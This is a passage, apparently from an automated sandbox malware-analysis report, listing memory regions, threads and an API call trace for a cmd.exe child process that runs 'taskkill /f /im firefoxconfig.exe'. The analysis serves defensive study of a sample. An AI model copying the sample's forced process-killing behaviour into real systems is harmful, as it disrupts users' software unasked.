0x5f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 3084 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3085 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 3086 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3087 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 3088 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 3089 start_va = 0x5f10000 end_va = 0x6246fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3090 start_va = 0x45b0000 end_va = 0x4699fff monitored = 0 entry_point = 0x45ed650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3091 start_va = 0x46f0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 3092 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 3093 start_va = 0x45b0000 end_va = 0x468ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3094 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3095 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 3096 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3097 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3098 start_va = 0x6cab0000 end_va = 0x6cabcfff monitored = 0 entry_point = 0x6cab3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3099 start_va = 0x6ca40000 end_va = 0x6caa6fff monitored = 0 entry_point = 0x6ca5b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3100 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3101 start_va = 0x6c9f0000 end_va = 0x6ca33fff monitored = 0 entry_point = 0x6ca0aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3102 start_va = 0x4500000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 3103 start_va = 0x4540000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 3104 start_va = 0x4690000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 3105 start_va = 0x6250000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 3106 start_va = 0x6290000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 3107 start_va = 0x62d0000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 3108 start_va = 0x6c9d0000 end_va = 0x6c9e0fff monitored = 0 entry_point = 0x6c9d8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3109 start_va = 0x6c910000 end_va = 0x6c9cefff monitored = 0 entry_point = 0x6c941e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3111 start_va = 0x44e0000 end_va = 0x44e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Thread: id = 228 os_tid = 0x8c8 Thread: id = 229 os_tid = 0xcdc Thread: id = 230 os_tid = 0x9a4 Thread: id = 231 os_tid = 0xb10 Thread: id = 232 os_tid = 0xfb0 Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x305b7000" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im firefoxconfig.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3118 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3123 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3124 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3126 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3127 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3128 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3129 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3130 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3131 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3132 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3133 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3134 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3135 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 3136 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3137 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3138 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3139 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3140 start_va = 0x4a0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 3141 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3142 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3143 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3144 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3145 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3146 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3147 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3148 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3149 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 3150 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3151 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3152 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3153 start_va = 0x810000 end_va = 0xb46fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 235 os_tid = 0xd08 [0180.329] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0180.329] __set_app_type (_Type=0x1) [0180.329] __p__fmode () returned 0x74974d6c [0180.329] __p__commode () returned 0x74975b1c [0180.329] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0180.329] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0180.329] GetCurrentThreadId () returned 0xd08 [0180.329] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd08) returned 0x78 [0180.330] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0180.330] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0180.330] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.336] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0180.336] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0180.337] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.337] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0180.337] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0180.337] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.337] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0180.337] GetConsoleOutputCP () returned 0x1b5 [0180.340] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0180.340] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0180.340] _get_osfhandle (_FileHandle=1) returned 0x13c [0180.340] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0180.340] _get_osfhandle (_FileHandle=1) returned 0x13c [0180.340] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0180.340] _get_osfhandle (_FileHandle=0) returned 0x130 [0180.340] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0180.340] GetEnvironmentStringsW () returned 0x617cc8* [0180.340] GetProcessHeap () returned 0x610000 [0180.340] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa1a) returned 0x6186f0 [0180.340] FreeEnvironmentStringsA (penv="A") returned 1 [0180.340] GetProcessHeap () returned 0x610000 [0180.340] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x610550 [0180.341] GetEnvironmentStringsW () returned 0x617cc8* [0180.341] GetProcessHeap () returned 0x610000 [0180.341] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa1a) returned 0x619118 [0180.341] FreeEnvironmentStringsA (penv="A") returned 1 [0180.341] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0180.341] RegCloseKey (hKey=0x88) returned 0x0 [0180.341] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0180.341] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.342] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0180.342] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.342] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.342] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0180.342] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0180.342] RegCloseKey (hKey=0x88) returned 0x0 [0180.342] time (in: timer=0x0 | out: timer=0x0) returned 0x62344222 [0180.342] srand (_Seed=0x62344222) [0180.342] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im firefoxconfig.exe \"" [0180.342] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im firefoxconfig.exe \"" [0180.342] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0180.343] GetProcessHeap () returned 0x610000 [0180.343] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x619b40 [0180.343] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x619b48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0180.343] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0180.343] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0180.343] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0180.343] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0180.343] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0180.343] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0180.343] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0180.343] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0180.343] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0180.343] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0180.343] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0180.343] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0180.344] GetProcessHeap () returned 0x610000 [0180.344] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x6186f0) returned 1 [0180.344] GetEnvironmentStringsW () returned 0x617cc8* [0180.345] GetProcessHeap () returned 0x610000 [0180.345] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa32) returned 0x61a798 [0180.345] FreeEnvironmentStringsA (penv="A") returned 1 [0180.345] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0180.345] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0180.345] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0180.345] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0180.345] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0180.345] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0180.345] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0180.345] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0180.345] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0180.345] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0180.345] GetProcessHeap () returned 0x610000 [0180.345] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x44) returned 0x6105c8 [0180.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0180.345] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0180.345] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0180.346] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x610618 [0180.346] FindClose (in: hFindFile=0x610618 | out: hFindFile=0x610618) returned 1 [0180.346] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x610618 [0180.346] FindClose (in: hFindFile=0x610618 | out: hFindFile=0x610618) returned 1 [0180.346] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0180.346] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x610618 [0180.346] FindClose (in: hFindFile=0x610618 | out: hFindFile=0x610618) returned 1 [0180.347] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0180.347] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0180.347] SetEnvironmentVariableW (lpName="=C:", 